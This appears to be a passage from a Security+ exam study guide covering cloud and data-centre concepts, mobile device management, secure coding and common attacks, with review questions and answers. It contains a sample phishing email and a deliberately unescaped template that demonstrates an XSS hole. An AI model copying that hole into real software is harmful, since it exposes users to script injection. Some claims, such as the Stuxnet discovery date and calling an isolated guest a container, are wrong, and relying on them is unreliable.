The servers for both cloud and virtualization, the storage servers and virtual hosts, are located in server farms that are in data centers. If these servers get too hot, the devices will fail. Therefore, in a data center, we have hot and cold aisles:


Figure 23: HVAC

The cold aisle is where the cold air comes in, and it faces the front of the servers. The rears of the servers face each other and push out hot air into the hot aisles, where it is allowed to escape through a chimney. This way, the temperature can be regulated, which ensures the availability of the IT systems.

Network environments

Let's look at some of the network environments.

On-premises

On-premises is where your company's network is inside a physical building; you will then have physical firewalls, routers, and switches. Each person will have a physical machine, the software is normally held on disks, and the IT team is on-site. You have total control of and responsibility for your resources.

Hosted services

Hosted services are technology services offered to you or your company by a provider that hosts the physical servers running that service somewhere else. Access to the service is usually provided through a direct network connection that may or may not run via the internet. The hosted services provider has full responsibility over your resources, including backup.

Cloud-hosting services

Cloud-hosting services provide hosting on virtual servers, which pull their computing resources from high-end servers that obtain their storage from a SAN. Access to resources is either via a leased line or the internet. The cloud provider has full responsibility for the hardware and availability of the IT systems:


Practical exercise – is the cloud cost-effective?

In this exercise, you are going to go to Amazon Web Services, which provides a calculator to see how much you could save by moving your infrastructure into the cloud. The instructions are accurate at the time of printing, but you may need to use them as a guideline if Amazon changes its website.

Search Google for: Amazon Web Services, pricing. Or go to Amazon Web Services and press the Pricing tab. Perform the following steps:

  1. Select Pricing:

AWS Pricing: Calculate My Cloud Savings

  2. Press Calculate TCO.

  3. How much did you save? Was it cost-effective?

  4. Now, search for another cloud provider and use their calculator to see who is more cost-effective.

Review questions

  1. In a cloud environment, what is elasticity?

  2. In which cloud environment would I install the software and then have to update the patches?

  3. Which cloud model is Office 365?

  4. What is the major benefit of using a public cloud?

  5. What is a cloud single-tenant model?

  6. What is a cloud multitenant model?

  7. Describe how a community cloud operates.

  8. What are the limitations imposed on a CSP regarding data storage?

  9. Who is responsible for the disaster recovery of hardware in a cloud environment?

  10. What is a cloud access security broker (CASB)?

  11. What model is it if you own the premises and all of the IT infrastructure resides there?

  12. What is a hybrid cloud model?

  13. What is distributive allocation?

  14. What type of model deals with identity management?

  15. What RAID model has a minimum of three disks? How many disks can it afford to lose?

  16. What are the two RAID models that have a minimum of four disks?

  17. What is the difference between RAID 5 and RAID 6?

  18. Where will a diskless virtual host access its storage?

  19. If you have a virtual switch that resides on a SAN, what connector will you use for a VLAN?

  20. What type of disks does a SAN use?

  21. Name a Type 1 hypervisor.

  22. What type of hypervisor can be installed on bare-metal machines?

  23. What is the machine that holds a number of virtual machines called?

  24. What is a guest and what is it called if you isolate it?

  25. In a virtual environment, what is sandboxing and how does it relate to chroot jail?

  26. Which is faster for data recovery: a snapshot or a backup tape?

  27. Why does HVAC produce availability for a datacenter?

  28. Which cloud model is it if you decide to use Salesforce?

  29. What do you call the cloud model where people from the same industry share resources and the cost of the cloud model?

  30. What is an example of cloud storage for a personal user?

Answers and explanations

  1. Elasticity allows you to increase and decrease cloud resources as you need them.

  2. Infrastructure as a service (IaaS) requires you to install the operating systems and patch the machines. The CSP provides bare-metal computers.

  3. Office 365 is a software as a service (SaaS) that provides email, Skype, and Office applications.

  4. The major benefit of a public cloud is that there is no capital expenditure.

  5. A private cloud is a single-tenant setup where you own the hardware.

  6. Public cloud is multitenant.

  7. A community cloud is where people from the same industry, such as a group of lawyers, design and share the cost of a bespoke application and its hosting, making it cost-effective.

  8. A CSP must store the data within regions. It cannot even move backup data to another region for resiliency.

  9. The CSP is responsible if the hardware fails.

  10. The CASB ensures that the policies between the on-premises and the cloud are enforced.

  11. On-premises is where you own the building and work solely from there.

  12. A hybrid cloud is where a company is using a mixture of on-premises and cloud.

  13. Distributive allocation is where the load is spread evenly across a number of resources, ensuring no one resource is overutilized. An example of this is using a load balancer.

  14. Security as a service (SECaaS) provides secure identity management.

  15. RAID 5 has a minimum of three disks and you can afford to lose one disk without losing data.

  16. RAID 6 and RAID 10 both have a minimum of four disks.

  17. RAID 5 has single parity and can lose one disk, where RAID 6 has double parity and can lose two disks.

  18. A diskless virtual host will get its disk space from a SAN.

  19. A VLAN on a SAN will use an iSCSI connector.

  20. A SAN will use fast disks, such as SSDs.

  21. Hyper-V, VMware, and Xen are all Type 1 hypervisors.

  22. Type 1 hypervisors can be installed on bare-metal machines.

  23. A host holds a number of virtual machines—it needs fast disks, memory, and CPU cores.

  24. A guest is a virtual machine, for example a Windows 10 virtual machine, and if it is isolated it is called a container.

  25. Sandboxing is where you isolate an application for patching, testing, or because it is dangerous. A chroot jail is for sandboxing in a Linux environment.

  26. A snapshot is faster at recovering than any other backup solution.

  27. HVAC keeps the servers cool by importing cold air and exporting hot air. If a server's CPU overheats, it will cause the server to crash.

  28. Salesforce is an online sales package; this is software as a service (SaaS).

  29. A community cloud is where people from the same industry share resources.

  30. Cloud storage for personal users could be iCloud, Google Drive, Microsoft OneDrive, or Dropbox.

Managing Hosts and Applications Deployment

In this chapter, we are going to look at different mobile devices and their characteristics, and applications that run on those devices. In the Security+ exam, you need to know all of these aspects thoroughly, as this chapter is heavily tested. Let's first of all look at deploying mobile devices securely, followed by their management and security.

We will cover the following exam objectives in this chapter:

Deploying mobile devices securely

Mobile devices are now used in our everyday lives and they pose problems for security teams as they are very portable and extremely easy to steal. In this module, we will look at some of the problems that you may face as a security professional. First, let's look at the different deployment models.

Mobile Device Management (MDM) sets policies on the use of these tools to protect the network. For example, they may prevent the camera being used on mobile devices and could also prevent a smartphone from being able to send/receive texts.

Bring your own device

Bring Your Own Device (BYOD) is where an employee is encouraged to bring in their own device so that they can use it for work. Although it may save the employer money, it also has its pitfalls. BYOD needs two policies to be effective:

Exam tip:
BYOD relies on an acceptable use policy and onboarding/offboarding policies being adopted.

Choose your own device

Choose Your Own Device (CYOD) avoids problems of ownership because the company has a variety of tablets, phones, and laptops. When a new employee comes along, they merely choose one of these devices from a list. When they leave the company and offboard, the devices are taken from them as they belong to the company. The acceptable use policy would state that the devices can only store company data as they are corporate-owned devices.

Corporate-owned personally-enabled

Corporate-Owned Personally-Enabled (COPE) is where the company purchases the device, such as a tablet, phone, or laptop, and allows the employee to use it for personal use. It is a much better solution for the company than BYOD. However, the IT team can limit what applications run on the devices as they are corporate-owned.

The COPE model can also help IT work within legal and regulatory parameters. Some European countries prohibit companies from wiping data on personal devices; if an employee loses a device, a remote wipe cannot be done. However, with COPE, the IT team has every right to wipe it remotely as it is corporate-owned and they remain compliant.

Virtual desktop infrastructure

A Virtual Desktop Infrastructure (VDI) is where an employee's desktop is based in the cloud or a virtual platform, and this can be accessed by using a mobile device, such as a tablet or laptop.

Mobile device connection methods

There are various different connection methods for mobile devices:

If you live in an area where the cellular data shows no service, you could turn on Wi-Fi calling on a modern smartphone to connect to your carrier's network. But beware: this is only a method of connecting to the carrier's network; they still charge you as normal for the calls.

If you are connecting to a Wi-Fi hotspot in a hotel, you must be careful, as most are insecure.

Companies often have a guest wireless network that visitors can use, or their employees can use at lunchtime.

Exam tip:
Near field communication is used for contactless payment within 4 cm of the card.


Figure 1: SATCOM

Mobile device management concepts

MDM is software that allows security administrators to control, secure, and enforce policies on smartphones, tablets, and other endpoint devices. Let us look at the different aspects of MDM.

Push notification services can be used to inform the device owner that an email or a text has arrived. For example, if someone sends you a message to your LinkedIn account, a push notification can tell you that you have a new message.

Accessing the device

Mobile devices are very small and very easy to steal, therefore we need to look at how we can prevent someone from accessing the data even if the device has been lost or stolen. We will first look at screen locks and passwords, followed by biometrics, and then context-aware authentication:

Exam tip:
Mobile devices need screen locks and strong passwords to protect them.

Device management

Corporate devices need to be controlled so that employees cannot simply connect to an app store and download every application that they wish. For example, allowing games on corporate devices would have an adverse impact on productivity and security. We are now going to look at the downloads, applications, and content managers, and their characteristics, followed by remote wipe:

Exam tip:
Geo-tracking will tell you the location of a stolen device.

Device protection

Mobile devices are very easy to lose or steal, so we must have some way of finding those devices; we are going to look at the differences between geofencing, geolocation, and using cable locks:

Exam tip:
Geofencing prevents mobile devices from being taken off the company's premises.

Device data

To protect the data that is stored on a device, we should implement Full Device Encryption (FDE), as this protects data stored on mobile devices while it is data at rest. The device requires a Trusted Platform Module (TPM) chip to store the encryption keys:

Containerization offers organizations the ability to deploy and manage corporate content securely in an encrypted space on the device. All corporate resources, such as proprietary applications, corporate emails, calendars, and contacts, reside within this managed space. We could also place an application inside a virtual machine to segregate it from the laptop.

Storage segmentation is where an external device is connected to a laptop, for example a USB flash drive, or it could be a Secure Data card (SD card). This allows the data on storage segmentation to be separate from any application or data already on the device.

Mobile device enforcement and monitoring

There are many different tools and features that roll out with mobile devices. As a security professional, you need to know the security threats that they pose. Some of the features that a security professional should be well-versed in are mentioned here:

Exam tip:
Rooting and jailbreaking remove the vendor restrictions on a mobile device to allow unsupported software to be installed.


Industrial control system

Industrial Control System (ICS) is a general term that encompasses several types of control systems and instrumentation used for industrial process control. They are controlled by a SCADA system and are used for:

Supervisory control and data acquisition

Supervisory Control and Data Acquisition (SCADA) systems are automated control systems that are crucial for industrial organizations since they help to maintain efficiency, process data for smarter decisions, and communicate system issues to help mitigate downtime.

The SCADA system can be used for oil or gas refineries where there are multiple phases of production. Iran had a uranium enrichment facility that was a SCADA system, but it suffered an attack from the Stuxnet virus that attacked the centrifuges. The Stuxnet virus was discovered in 2007, but many believe it could have been there in 2005:


Figure 2: SCADA system

The security of the SCADA system is paramount. A network firewall prevents unauthorized access to the network, then they will use a NIPS as an additional layer. If further segmentation is required, they could use VLANs internally. This is no different from protecting a corporate network.

Mobile devices – security implications of embedded systems

An embedded system is an electronic system that has software and is embedded in computer hardware. Some are programmable and some are not. Embedded systems are commonly found in consumer, cooking, industrial, automotive, medical, communications, commercial, and military applications.

Examples:

Let's now look at each of these:


Figure 3: IoT devices

Exam tip:
Multifunctional devices can be attacked through their network interfaces.

Special-purpose devices

Special-purpose devices are more expensive bespoke devices that provide a unique purpose. For example, there are man overboard devices that detect someone falling into the water; here, we are going to look at a defibrillator.

Mobile medical devices can include infusion devices that measure fluids that are given to patients in hospital. (See the following picture). Ambulances will carry life-support systems, such as defibrillators, that are used to save a person's life if they have just suffered from cardiac arrest. The defibrillators will have an SoC installed as it gives out instructions on how to use it, but if it detects a pulse, it will not send a charge:


Figure 4: Defibrillator

Some luxury vehicles have embedded systems that produce a wireless hotspot in the car so that when you are driving along, your passengers can connect to the internet. Others have the ability to carry out automatic self-parking. There have been many trials recently of self-driving cars; vendors, such as Google, are still trying to perfect their systems.

For many years, people have been flying model aircraft that also have embedded systems, but in the past 2-3 years, unmanned aerial vehicles (UAVs), also called drones, have been making the headlines. The military can use these drones to carry out surveillance of areas where it is too dangerous to send manned aircraft. Some drones can be as large as a mini-aircraft, and some can be as small as a model aircraft but can have a camera attached so that aerial photographs can be taken.

Secure application development and deployment concepts

Some of the concepts used while securing an application during the development and deployment phases are as follows:

Development life cycle models – waterfall vs agile

The Software Development Life Cycle (SDLC) is a structure followed by a development team within the software organization. It consists of a detailed plan describing how to develop, maintain, and replace specific software. There are two main models that are adopted. One is the traditional method, which is called waterfall, and the more dynamic method is called agile.

Waterfall

The waterfall model is the traditional method used in the SDLC as it has a linear and sequential pattern to it. The development of the software moves from the top to the bottom, with each phase needing to be completed before the next phase can begin:


Figure 5: Waterfall model

It starts with gathering information about the requirement, then it is put into the design phase, and then it is implemented. The testing phase is carried out before it goes into production; any testing carried out will be rolled back prior to deployment. The maintenance phase is for patching and fixing any bugs.

Agile

The agile method anticipates change and breaks down each project into prioritized requirements, delivering each individually within an iterative cycle. Adaptability and customer satisfaction by rapid delivery are the key concepts of this model:


Figure 6: Agile model

Agile versus waterfall

Waterfall is a structured software development methodology, and can often be quite rigid, whereas the agile methodology is known for its flexibility. Waterfall must finish one process completely before it can begin another. Agile is dynamic and is geared for rapid deployment to ensure customer satisfaction.

Exam tip: Waterfall is an SDLC model that requires each step to be completed before starting the next step.

DevOps

DevOps is where the IT operations and developers work together in the entire service life cycle, from design to rollout to production support. They use many of the same techniques as developers for their systems work.

Secure DevOps

Secure DevOps is where the security team, IT operations, and developers work together on software development; the focus is on reducing the time it takes for the software to get into production, which is why they adopt an agile SDLC. There are processes that help them and they are:

Example: Security automation could be set up to scan for vulnerabilities at 6 pm without any human intervention.

Secure coding techniques

Although most people that work in networking or security are not application developers, CompTIA has introduced secure coding into the syllabus. This section needs to be understood so it is written in the simplest format we could think of:

If the data is not input in the correct format, it will not be accepted. Input validation on web pages lists errors in red at the top of the page of the incorrect entries; this prevents SQL injection, integer overflow, and buffer overflow attacks.

Exam tip: System errors shown to users should be generic, but the logging of errors for administrators should log the full details.

Exam tip:
Stored procedures and input validation can prevent an SQL injection attack.

Exam tip: Obfuscation makes code obscure so that if it is stolen, it cannot be understood.

Code quality and testing

When an application developer writes an application, it needs to go through thorough testing before it is put into production. We need to ensure that the code does not have flaws or bugs that could be exploited by threat actors. The following Java snippet compiles, but fails at runtime on the last line because it uses a reference that holds null:

String s = null;

String s1 = "a";

String s2 = s1 + s; // no exception here: string concatenation turns null into the text "null", giving "anull"

int n = s.length(); // NullPointerException: s holds null, so there is no object on which to call length()

Exam tip: A null pointer exception occurs when code dereferences (uses) a reference that holds null instead of pointing to an object.

Example: Microsoft has a tool called Jetstress that simulates a storage load on an Exchange email server. The administrator defines the number of users, and when Jetstress runs, it reports the disk I/O and storage usage. The test results in a pass or fail.

Server-side versus client-side execution and validation

Website scripts run in one of two places:

Client-side validation (JavaScript running in the browser) is much quicker and gives the user immediate feedback, but an attacker can disable or modify that JavaScript, or send requests straight to the server with a tool such as an intercepting proxy, and so bypass the client side entirely. Server-side validation takes longer, but it checks the input on a system the attacker does not control and stops the attacker who has just bypassed the client side. There is more control over server-side validation and it is more secure; client-side validation is a usability feature, not a security control.
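As an added example (not code from the book), the Python below models the point above: the same form field is checked by the browser and again by the server, and a crafted request that skips the browser is still caught. The field names, limits, and allowlist patterns are assumptions for this example; the server check also illustrates the length and range checks that stop oversized and out-of-range values.

```python
import re

# Added example, not from the book. Field names, limits and patterns are assumptions.
MAX_QUANTITY = 99
NAME_RE = re.compile(r"[A-Za-z][A-Za-z' -]{0,31}")   # allowlist: letters, space, ' and -, max 32 chars
QTY_RE = re.compile(r"[0-9]{1,2}")                    # allowlist: one or two digits


def client_side_check(form: dict) -> bool:
    """What the page's JavaScript would do: quick, friendly, and entirely bypassable."""
    return bool(QTY_RE.fullmatch(form.get("quantity", "")))


def server_side_validate(form: dict) -> dict:
    """Authoritative check on the server. Returns cleaned, typed values or raises ValueError."""
    name = form.get("name", "")
    qty_raw = form.get("quantity", "")
    if not isinstance(name, str) or not NAME_RE.fullmatch(name):
        raise ValueError("name: letters, spaces, apostrophes and hyphens only, max 32 characters")
    if not isinstance(qty_raw, str) or not QTY_RE.fullmatch(qty_raw):
        raise ValueError("quantity: one or two digits only")   # blocks '-1', '1e9', '5; DROP TABLE'
    qty = int(qty_raw)                       # safe: at most two digits, so the value cannot overflow
    if not 1 <= qty <= MAX_QUANTITY:
        raise ValueError("quantity: must be between 1 and 99")   # blocks 0 and 00
    return {"name": name, "quantity": qty}


def submit(form: dict, via_browser: bool) -> tuple:
    """Simulate the request path. A real attacker uses curl or an intercepting proxy."""
    if via_browser and not client_side_check(form):
        return ("rejected by browser", None)
    try:
        return ("accepted", server_side_validate(form))
    except ValueError as err:
        return ("rejected by server", str(err))


if __name__ == "__main__":
    # Constructed requests: one honest, the rest crafted to skip the browser check.
    print(submit({"name": "Alice", "quantity": "5"}, via_browser=True))
    print(submit({"name": "Alice", "quantity": "-1"}, via_browser=True))    # browser stops it
    print(submit({"name": "Alice", "quantity": "-1"}, via_browser=False))   # server still stops it
    print(submit({"name": "Alice", "quantity": "99999999999999999999"}, via_browser=False))
    print(submit({"name": "A" * 500, "quantity": "5"}, via_browser=False))
    print(submit({"name": "<script>alert(1)</script>", "quantity": "5"}, via_browser=False))
```

The server check is written as an allowlist (what is permitted) rather than a blocklist (known bad strings), because an attacker only has to find one bad string the blocklist missed.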

Review questions

  1. What is the purpose of MDM?

  2. What is BYOD?

  3. What two policies need to be agreed upon before BYOD is implemented?

  4. How do BYOD and CYOD differ, and what are the benefits of CYOD to a company?

  5. Name three types of mobile device connection methods.

  6. What is used when we make a contactless payment using our debit card?

  7. Which service allows your mobile device to be notified when an email message arrives in your inbox?

  8. What two measures should I take to secure my mobile device?

  9. What will prevent my laptop from being stolen when I am in a meeting with my boss?

  10. What can I do to protect the data at rest on my mobile device?

  11. What can I implement if I want to keep my personal data and pictures separate from my corporate data on my smartphone?

  12. Once I have been authenticated by the VPN server, what method can be implemented to ensure that my mobile device is fully patched?

  13. What is rooting and which operating system does it affect?

  14. What is the purpose of jailbreaking and which operating system does it affect?

  15. If my smartphone is with T-Mobile, what can be done at the end of my 2 year contract so that I can use Verizon as my provider?

  16. What is the purpose of sideloading an application?

  17. What is the benefit of USB OTG?

  18. If I work in the R&D department, what are the two dangers when I take my cellphone to work?

  19. When I go on holiday with friends from school, how can people on my social media know where the photograph was taken?

  20. If I have been working in the sales department and have been using my cellphone to make work-related contactless payments, what does my company need to ensure happens during offboarding?

  21. What two methods can I use to set up a wireless connection with another mobile device without using a WAP?

  22. What is the purpose of tethering?

  23. What is an embedded electronic system? Give two examples.

  24. What is the purpose of a SCADA system?

  25. What category of device are my smart TV and wearable technology?

  26. What is home automation?

  27. What is the purpose of an SoC?

  28. If a process is not carried out within a specified period of time, which causes the process to fail, what method am I using?

  29. What is the most likely way an attacker would gain control of an MFD?

  30. What is the purpose of the security team controlling the HVAC in a data center?

  31. Someone at work has suffered a cardiac arrest; the first aid delegate takes out a defibrillator that gives instructions on the steps to take. What has been built into the device to give these instructions?

  32. Give an example of embedded systems that can be used with vehicles.

  33. What is a UAV? Give two examples.

  34. What is the purpose of baselining?

  35. What type of system am I using if I totally destroy the system and create a new system when an update takes place?

  36. What software development life cycle is a traditional method that needs the previous stage to be complete before the next stage can start?

  37. What software development life cycle is fast and customer-focused?

  38. What is the purpose of security automation in secure DevOps?

  39. What is the benefit of using continuous integration in secure DevOps?

  40. What is the main problem with a race condition when using an application?

  41. What is the perfect way to set up error handling in an IT system?

  42. Explain input validation and name three types of attacks that this could prevent.

  43. How can I prevent an SQL injection attack other than with input validation?

  44. What is the purpose of code signing?

  45. What is the purpose of obfuscation?

  46. What is dead code and how should it be treated?

  47. If I am an Android developer, what can I obtain from the internet to help me make an application and get it to market quickly?

  48. Explain how pointer dereference works.

  49. What is a null pointer exception?

  50. What is the technique used by developers to ensure that the application written conforms to the original specifications given by the customer?



Answers and explanations

  1. MDM sets and enforces policies to protect the network from mobile devices.

  2. BYOD is where you bring your personally owned device to use in the workplace.

  3. The acceptable use policy and the onboarding/offboarding policies need to be agreed upon before you can implement BYOD.

  4. BYOD devices are personally owned, whereas CYOD devices are company-owned. Using CYOD allows the security administrators to remotely wipe the device if it is stolen and makes offboarding very easy, as the company owns the device, so data ownership will never be an issue.

  5. Mobile devices can connect through cellular, wireless, and Bluetooth connections.

  6. Near field communication is used to make a contactless payment; the device must be within 4 cm of the card.

  7. Push notification services notify your mobile device when an email message arrives in your inbox.

  8. Screen locks and strong passwords are needed to secure a mobile device.

  9. A cable lock will prevent my laptop from being stolen when I am in a meeting with my boss.

  10. Full device encryption is used to protect the data at rest on my mobile device.

  11. Storage segmentation will allow you to keep personal data separate from business data on a cellphone.

  12. Network access control ensures that devices are fully patched before they enter the corporate network.

  13. Rooting can be carried out on Android devices: custom firmware is downloaded that removes the restrictions the vendor puts on the mobile device. This then allows you to run unauthorized software on the device.

  14. Jailbreaking is the same as rooting, except that it lifts the restrictions on Apple's iOS devices. You can then install unauthorized software but can still access the Apple App Store.

  15. Carrier unlocking will allow me to use my smartphone on another carrier's network.

  16. Sideloading allows you to install third-party, unauthorized software on your mobile device.

  17. USB On-The-Go (OTG) allows you to connect a USB device to your mobile device. Apple does not allow USB OTG.

  18. If I work in a sensitive area, my cellphone will allow me to take pictures and post them on my social media. I could also make a video or record conversations in confidential meetings.

  19. Most modern smartphones use GPS tracking to store the location where pictures were taken.

  20. When they offboard people who use contactless payment on a smartphone, they need to ensure that the business credit card details have been removed from the wallet.

  21. Wi-Fi Direct and an ad hoc network allow wireless connections with another mobile device without using a WAP.

  22. Tethering allows you to use a cellphone to provide internet access to a laptop.

  23. Embedded electronic systems have software embedded into the hardware; some use an SoC. Examples are microwave ovens, gaming consoles, security cameras, wearable technology, smart TVs, medical devices such as defibrillators, and self-driving cars.

  24. SCADA systems are industrial control systems used to monitor and control industrial processes, for example in the refining of uranium, oil, or gas.

  25. Smart TVs and wearable technology are classified as IoT devices.

  26. Home automation is where you can control temperature, lighting, entertainment systems, alarm systems, and many appliances.

  27. An SoC is a low-power integrated chip that integrates all of the components of a computer or electronic system. An example would be the controller for a defibrillator. Think of it as a complete computer on a single chip.

  28. A Real-Time Operating System (RTOS) processes data as it comes in without any buffer delays. The process will fail if it is not carried out within a certain period of time.

  29. An attacker would most likely gain control of an MFD through its network interface.

  30. When a security team controls the HVAC in a data center, they can ensure that the temperature is regulated and the servers remain available. They also know which rooms are occupied based on the use of air-conditioning and electricity.

  31. An SoC gives instructions on the steps to take when using a defibrillator; however, if it detects a pulse, it will not send a charge.

  32. Examples of embedded systems in vehicles are self-parking and self-driving cars.

  33. Unmanned aerial vehicles are drones or small model aircraft that can be sent to areas where manned aircraft cannot go. They can be fitted with a camera to record events or take aerial photographs; an example would be determining the spread of a forest fire.

  34. Baselining is the process of recording all applications on a mobile device. You can then run the baseline again at a later stage to find out which applications have been added since the last baseline.

  35. An immutable system is totally destroyed and rebuilt when an update is made, rather than being modified in place. This is ideal for a cloud or virtual environment.

  36. Waterfall is a traditional software development life cycle model that needs each stage to be completed before the next stage can proceed.

  37. Agile is a software development life cycle model that is fast and customer-focused.

  38. Security automation is where tasks such as vulnerability scanning are done by the computer and not by the security administrator.

  39. Continuous integration is where the developer sends code to a central repository two or three times a day so that it can be validated.

  40. A race condition is when two threads of an application access the same data at the same time, so the outcome depends on which one gets there first.

  41. The perfect way to set up error handling is for the user to get generic information but for the log files to include a full description of the error.

  42. Input validation is where data is checked to be in the correct format before it is inserted into the system. SQL injection, buffer overflow, and integer overflow attacks are prevented by using input validation.

  43. Other than input validation, a stored procedure can prevent an SQL injection attack.

  44. Code signing confirms that the code has not been tampered with.

  45. Obfuscation is taking code and making it obscure so that if it is stolen it will not be understood.

  46. Dead code is never used, but could introduce errors into the program life cycle; it should be removed.

  47. Using a third-party library will help a developer obtain code from the internet to help make an application and get it to market quickly. There are many for Android and JavaScript.

  48. Dereferencing a pointer means following it to read the object it points to; if the pointer holds null, there is no object and the dereference fails.

  49. A null pointer exception is a runtime exception where the application has tried to dereference a reference that holds null.

  50. Model verification is a process used by developers to ensure that the application conforms to the original specifications.

Protecting Against Attacks and Vulnerabilities

In this chapter, we are going to look at attacks and vulnerabilities. Each type of attack has its own unique characteristics. This module is probably the most heavily tested module in the Security+ exam. This chapter needs to be thoroughly understood, as the attack questions are sometimes very vague, so if you do not understand the concepts fully, you may not understand what is being asked.

We will cover the following exam objectives in this chapter:

Virus and malware attacks

In today's world, viruses and malware are rife; there are many different variants and we will look at each of these in turn:


Figure 1: Ransomware

Trojans attack the System32 and SysWOW64 directories by placing a .dll file there.

For example, Ghost RAT is a remote access Trojan that was originally designed by threat actors in China. A user clicks on a link and a dropper program called server.exe installs Ghost RAT with a svchost.dll that then allows the attacker to take control of the computer. It can then log keystrokes, download and upload files, and stream the webcam and microphone feeds.

In a Linux environment, a rootkit attacks the /usr/bin directory.

Social engineering attacks

Social engineering attacks rely on exploiting someone's personality or emotions rather than a technical flaw. There are various social engineering attacks; let's look at each of them and the principles of why they are effective:


Figure 2: Phishing attack


Figure 3: Hoax virus

This email said that this cute little bear was a virus and should be deleted, and that anti-virus software from anti-virus vendors would not find it. That part was true only because it was not a virus: it was an operating system file, and deleting it would damage your computer. The attack worked because the bear file really was there when the user looked for it, so the warning looked real. Another example of a hoax would be purchasing fake anti-virus software that does not work.

From: Ian Neil (CEO)

To: All Staff

Subject: UPDATE YOUR FINANCIAL DETAILS

Dear All

The finance team are moving to a new finance application and have told me that personnel within the company have not updated their bank details. You need to click on this link and update your details: http://update.details.wehackyou.com.

Failure to do so by the end of play today will result in disciplinary action against those individuals that do not comply:

Kind Regards

Ian Neil

Chief Executive Officer

An email from your CEO, a high-level executive, or the HR manager telling you to fill in a form or click on a link is a social engineering authority attack.

Allowing a fireman into your server room is a social engineering urgency attack.

Common attacks

If you are going to gain the CompTIA Security+ qualification, you need to know the different types of attacks that you may encounter; there are numerous attacks and you need to know each of these, their characteristics, and how they can be prevented. Let's look at each of these in turn.

Application/service attacks

A SYN flood attack is where only the first two parts of the TCP three-way handshake (SYN and SYN-ACK) take place and the final ACK never arrives, leaving the server holding many half-open connections in a state of limbo until they time out. A DDoS attack sends a high volume of these from many sources at once.
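As an added example (not code from the book), here is a small half-open connection tracker in Python run over a constructed packet log; it replays each handshake from the server's point of view and reports sources with many connections stuck after SYN and SYN-ACK. The addresses, ports, threshold, and packet record format are assumptions for this example.

```python
from collections import Counter

# Added example, not from the book. Addresses, ports and the threshold are assumptions.
SERVER = "192.0.2.10"
THRESHOLD = 10   # half-open connections from one source before we report it


def build_packets() -> list:
    """Constructed packet log: (src_ip, dst_ip, src_port, dst_port, flags)."""
    packets = [
        # An honest client completes the handshake: SYN, SYN-ACK, ACK.
        ("10.0.0.5", SERVER, 51000, 80, "S"),
        (SERVER, "10.0.0.5", 80, 51000, "SA"),
        ("10.0.0.5", SERVER, 51000, 80, "A"),
    ]
    # A flooder sends SYNs from fresh ports and never answers the SYN-ACK.
    for i in range(25):
        packets.append(("198.51.100.7", SERVER, 40000 + i, 80, "S"))
        packets.append((SERVER, "198.51.100.7", 80, 40000 + i, "SA"))
    return packets


def handshake_states(packets, server=SERVER) -> dict:
    """Replay the handshake per (client ip, client port) from the server's point of view."""
    state = {}
    for src, dst, sport, dport, flags in packets:
        client = (src, sport) if dst == server else (dst, dport)
        if flags == "S" and dst == server:
            state[client] = "SYN_RECEIVED"          # server allocates a half-open entry
        elif flags == "A" and dst == server and state.get(client) == "SYN_RECEIVED":
            state[client] = "ESTABLISHED"           # third step done; no longer half-open
        # "SA" from the server changes nothing: we are still waiting for the client's ACK
    return state


def half_open_by_source(packets) -> Counter:
    """How many half-open connections each client IP is holding open."""
    return Counter(ip for (ip, _), st in handshake_states(packets).items() if st == "SYN_RECEIVED")


def total_half_open(packets) -> int:
    """Half-open entries the server is holding in total, whoever sent them."""
    return sum(half_open_by_source(packets).values())


def suspected_flooders(packets, threshold=THRESHOLD) -> list:
    return sorted(ip for ip, n in half_open_by_source(packets).items() if n >= threshold)


if __name__ == "__main__":
    log = build_packets()
    print("half-open per source:", dict(half_open_by_source(log)))
    print("total half-open:", total_half_open(log))
    print("suspected SYN flood sources:", suspected_flooders(log))
```

Real floods usually spoof the source address, so a per-source count can be evaded; the total number of half-open entries on the server is the more robust signal, which is why defences such as SYN cookies act on that rather than on who appears to be sending.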


Figure 4: DDOS attack


Figure 5: Man-in-the-middle

For example, an attacker sits between two parties and relays their conversation, impersonating each to the other, in order to gain access to funds. The attacker intercepts the public key being exchanged and substitutes his own, so he can read and alter the traffic while both sides believe they are talking to each other over a secure connection. While shopping online from home or a mobile device, the victims think that they are buying goods from a legitimate source, but instead their money is being stolen.

Exam tip:Kerberos prevents replay attacks as it uses updated sequence numbers and time stamps.

A POODLE attack is a man-in-the-middle downgrade attack: the attacker forces the connection back to SSL 3.0 in CBC mode and then exploits a padding weakness in that mode to recover data.


Figure 6: Zero day exploit

One way to detect a zero day exploit is to have taken a baseline of your computer previously; you can then check what has changed since the baseline, and those changes will identify the exploit. If you have no previous baseline, you will not detect it this way.

A zero day exploit cannot be detected by signature-based security devices, as no signature, patch, or update exists for it yet; it can take days before the vendor releases one.


Figure 7: DNS poisoning

If we look at Figure 7, Computer A has already been to the legitimate website called Web 1, and its proper IP address of 1.1.1.1 has been placed in its DNS cache. When DNS resolution is performed, the DNS cache is searched first then the hosts file is next, followed by the internal DNS server. The attacker has now deleted the entry for Web 1 and inserted his entry for Web 1 with an IP address of 2.2.2.2. Now, when the user enters the URL www.web1.com, the only entry in the DNS cache is Web1 2.2.2.2 and the user is diverted to a website that looks like the legitimate website. When he enters his card details to make a purchase, his account is emptied.

Programming attacks

Programming attacks are where the attacker injects scripts into an application, or sends more characters or larger integers than the program expects. Let's look at these in turn:

Exam tip: In a Christmas tree attack, the URG, PUSH, and FIN flags in the TCP header are all set to 1 (lit up like a Christmas tree). Because URG is set, the packet claims priority over other traffic.

# Server-side template (Python 3 syntax) that pastes the latest stored comment straight into the page
print("<html>")
print("Latest comment:")
print(database.latestComment)  # attacker-controlled text is inserted with no escaping
print("</html>")

<html>

Latest comment:

<script> (Javascript code is placed here) </script>

</html>

Example 1—JavaScript—creating a money variable

JavaScript can use the command var that means variable; an example would be to set a variable for money then allocate it a value of 300.00. You can see we use var for the variable and then use money as its label. In the next row, we use the money variable and give it a value of 300.00:

<script type="text/javascript">
<!--
var money;
money = 300.00;
//-->
</script>

Example 2—Javascript—setting the day of the month

We will use JavaScript to set the day of the month; you will notice the JavaScript code sits between the HTML tags <script>, which starts the script, and </script>, which ends it. The command var is very common in JavaScript:

<!DOCTYPE html>
<html>
<body>
<p>Click the button to display the date after changing the day of the month. </p>
<button onclick="myFunction()">Try it</button>
<p id="demo"></p>
<script>

function myFunction() {
var d = new Date();
d.setDate (15);
document.getElementById("demo").innerHTML = d;
}
</script>
</body>
</html>

An XSS attack can often be spotted in exam questions by looking for JavaScript, such as the command var, sitting between the HTML tags <script> and </script> in user-supplied input. Scripts with var are likely to be JavaScript. It is a very popular exam topic:
